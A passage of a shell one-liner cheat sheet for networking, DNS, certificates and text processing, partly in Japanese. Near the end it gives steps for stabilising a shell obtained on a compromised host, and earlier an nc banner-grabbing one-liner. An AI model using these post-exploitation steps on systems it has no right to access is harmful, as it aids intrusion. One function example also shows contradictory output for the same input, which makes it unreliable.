netstat -an | awk '/ESTABLISHED/ { split($5,ip,":"); if (ip[1] !~ /^$/) print ip[1] }' | \
sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1) ; for (i = 0; i < $1; i++) {printf("*")}; print "" }'
Monitor open connections for specific port including listen, count and sort it per IP
watch "netstat -plan | grep :443 | awk {'print \$5'} | cut -d: -f 1 | sort | uniq -c | sort -nk 1"
Grab banners from local IPv4 listening ports
netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}"

Tool: rsync
Rsync remote data as root using sudo
rsync --rsync-path 'sudo rsync' username@hostname:/path/to/dir/ /local/

Tool: host
Resolves the domain name (using external dns server)
host google.com 9.9.9.9
Checks the domain administrator (SOA record)
host -t soa google.com 9.9.9.9

Tool: dig
Resolves the domain name (short output)
dig google.com +short
Lookup NS record for specific domain
dig @9.9.9.9 google.com NS
Query only answer section
dig google.com +nocomments +noquestion +noauthority +noadditional +nostats
Query ALL DNS Records
dig google.com ANY +noall +answer
DNS Reverse Look-up
dig -x 172.217.16.14 +short

Tool: certbot
Generate multidomain certificate
certbot certonly -d example.com -d www.example.com
Generate wildcard certificate
certbot certonly --manual --preferred-challenges=dns -d example.com -d *.example.com
Generate certificate with 4096 bit private key
certbot certonly -d example.com -d www.example.com --rsa-key-size 4096

Tool: network-other
Get all subnets for specific AS (Autonomous system)
AS="AS32934"
whois -h whois.radb.net -- "-i origin ${AS}" | \
grep "^route:" | \
cut -d ":" -f2 | \
sed -e 's/^[ \t]//' | \
sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | \
cut -d ":" -f2 | \
sed -e 's/^[ \t]/allow /' | \
sed 's/$/;/' | \
sed 's/allow  */subnet -> /g'
Resolves domain name from dns.google.com with curl and jq
_dname="google.com" ; curl -s "https://dns.google.com/resolve?name=${_dname}&type=A" | jq .
Tool: git
Log alias for a decent view of your repo
# 1)
git log --oneline --decorate --graph --all

# 2)
git log --graph \
--pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' \
--abbrev-commit

Tool: python
Static HTTP web server
# Python 3.x
python3 -m http.server 8000 --bind 127.0.0.1

# Python 2.x
python -m SimpleHTTPServer 8000
Static HTTP web server with SSL support
# Python 3.x
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

httpd = HTTPServer(('localhost', 4443), BaseHTTPRequestHandler)

httpd.socket = ssl.wrap_socket (httpd.socket,
        keyfile="path/to/key.pem",
        certfile='path/to/cert.pem', server_side=True)

httpd.serve_forever()

# Python 2.x
import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('localhost', 4443),
        SimpleHTTPServer.SimpleHTTPRequestHandler)

httpd.socket = ssl.wrap_socket (httpd.socket,
        keyfile="path/tp/key.pem",
        certfile='path/to/cert.pem', server_side=True)

httpd.serve_forever()
Encode base64
python -m base64 -e <<< "sample string"
Decode base64
python -m base64 -d <<< "dGhpcyBpcyBlbmNvZGVkCg=="
Tool: awk
Search for matching lines
# egrep foo
awk '/foo/' filename
Search non matching lines
# egrep -v foo
awk '!/foo/' filename
Print matching lines with numbers
# egrep -n foo
awk '/foo/{print FNR,$0}' filename
Print the last column
awk '{print $NF}' filename
Find all the lines longer than 80 characters
awk 'length($0)>80{print FNR,$0}' filename
Print only lines of less than 80 characters
awk 'length < 80' filename
Print double new lines a file
awk '1; { print "" }' filename
Print line numbers
awk '{ print FNR "\t" $0 }' filename
awk '{ printf("%5d : %s\n", NR, $0) }' filename   # in a fancy manner
Print line numbers for only non-blank lines
awk 'NF { $0=++a " :" $0 }; { print }' filename
Print the line and the next two (i=5) lines after the line matching regexp
awk '/foo/{i=5+1;}{if(i){i--; print;}}' filename
Print the lines starting at the line matching 'server {' until the line matching '}'
awk '/server {/,/}/' filename
Print multiple columns with separators
awk -F' ' '{print "ip:\t" $2 "\n port:\t" $3' filename
Remove empty lines
awk 'NF > 0' filename

# alternative:
awk NF filename
Delete trailing white space (spaces, tabs)
awk '{sub(/[ \t]*$/, "");print}' filename
Delete leading white space
awk '{sub(/^[ \t]+/, ""); print}' filename
Remove duplicate consecutive lines
# uniq
awk 'a !~ $0{print}; {a=$0}' filename
Remove duplicate entries in a file without sorting
awk '!x[$0]++' filename
Exclude multiple columns
awk '{$1=$3=""}1' filename
Substitute foo for bar on lines matching regexp
awk '/regexp/{gsub(/foo/, "bar")};{print}' filename
Add some characters at the beginning of matching lines
awk '/regexp/{sub(/^/, "++++"); print;next;}{print}' filename
Get the last hour of Apache logs
awk '/'$(date -d "1 hours ago" "+%d\\/%b\\/%Y:%H:%M")'/,/'$(date "+%d\\/%b\\/%Y:%H:%M")'/ { print $0 }' \
/var/log/httpd/access_log

Tool: sed
Print a specific line from a file
sed -n 10p /path/to/file
Remove a specific line from a file
sed -i 10d /path/to/file
# alternative (BSD): sed -i'' 10d /path/to/file
Remove a range of lines from a file
sed -i <file> -re '<start>,<end>d'
Replace newline(s) with a space
sed ':a;N;$!ba;s/\n/ /g' /path/to/file

# cross-platform compatible syntax:
sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' /path/to/file
  • :a
    create a label
    a
  • N
    append the next line to the pattern space
  • $!
    if not the last line, ba branch (go to) label
    a
  • s
    substitute, regex for new line, by a space, global match (as many times as it can)
    /\n/
    / /
    /g

Alternatives:

# perl version (sed-like speed):
perl -p -e 's/\n/ /' /path/to/file

# bash version (slow):
while read line ; do printf "%s" "$line " ; done < file
Delete string +N next lines
sed '/start/,+4d' /path/to/file

Tool: grep
Search for a "pattern" inside all files in the current directory
grep -rn "pattern"
grep -RnisI "pattern" *
fgrep "pattern" * -R
Show only for multiple patterns
grep 'INFO*'\''WARN' filename
grep 'INFO\|WARN' filename
grep -e INFO -e WARN filename
grep -E '(INFO|WARN)' filename
egrep "INFO|WARN" filename
Except multiple patterns
grep -vE '(error|critical|warning)' filename
Show data from file without comments
grep -v ^[[:space:]]*# filename
Show data from file without comments and new lines
egrep -v '#|^$' filename
Show strings with a dash/hyphen
grep -e -- filename
grep -- -- filename
grep "\-\-" filename
Remove blank lines from a file and save output to new file
grep . filename > newfilename
Tool: perl
Search and replace (in place)
perl -i -pe's/SEARCH/REPLACE/' filename
Edit of files changing all foo to bar (and backup original)
*.conf
perl -p -i.orig -e 's/\bfoo\b/bar/g' *.conf
Prints the first 20 lines from files
*.conf
perl -pe 'exit if $. > 20' *.conf
Search lines 10 to 20
perl -ne 'print if 10 .. 20' filename
Delete first 10 lines (and backup original)
perl -i.orig -ne 'print unless 1 .. 10' filename
Delete all but lines between foo and bar (and backup original)
perl -i.orig -ne 'print unless /^foo$/ .. /^bar$/' filename
Reduce multiple blank lines to a single line
perl -p -i -00pe0 filename
Convert tabs to spaces (1t = 2sp)
perl -p -i -e 's/\t/  /g' filename
Read input from a file and report number of lines and characters
perl -lne '$i++; $in += length($_); END { print "$i lines, $in characters"; }' filename

Shell Tricks  [TOC]

When you get a shell, it is generally not very clean, but after following these steps, you will have a fairly clean and comfortable shell to work with.

  1. script /dev/null -c bash
  2. Ctrl-Z (to send it to background)
  3. stty raw -echo; fg
    (returns the shell to foreground)
  4. reset
    (to reset terminal)
  5. xterm
    (端末タイプを尋ねられた場合)
  6. export TERM=xterm; export SHELL=bash

シェル関数[目次]

目次
ドメイン解決
# Dependencies:
#   - curl
#   - jq

function DomainResolve() {

  local _host="$1"

  local _curl_base="curl --request GET"
  local _timeout="15"

  _host_ip=$($_curl_base -ks -m "$_timeout" "https://dns.google.com/resolve?name=${_host}&type=A" | \
  jq '.Answer[0].data' | tr -d "\"" 2>/dev/null)

  if [[ -z "$_host_ip" ]] || [[ "$_host_ip" == "null" ]] ; then

    echo -en "Unsuccessful domain name resolution.\\n"

  else

    echo -en "$_host > $_host_ip\\n"

  fi

}

例:

shell> DomainResolve nmap.org
nmap.org > 45.33.49.119

shell> DomainResolve nmap.org
Unsuccessful domain name resolution.
ASNを取得する
# Dependencies:
#   - curl

function GetASN() {

  local _ip="$1"

  local _curl_base="curl --request GET"
  local _timeout="15"

  _asn=$($_curl_base -ks -m "$_timeout" "http://ip-api.com/line/${_ip}?fields=as")

  _state=$(echo $?)

  if [[ -z "$_ip" ]] || [[ "$_ip" == "null" ]] || [[ "$_state" -ne 0 ]]; then

    echo -en "Unsuccessful ASN gathering.\\n"

  else

    echo -en "$_ip > $_asn\\n"

  fi

}

例:

shell> GetASN 1.1.1.1
1.1.1.1 > AS13335 Cloudflare, Inc.

shell> GetASN 0.0.0.0
Unsuccessful ASN gathering.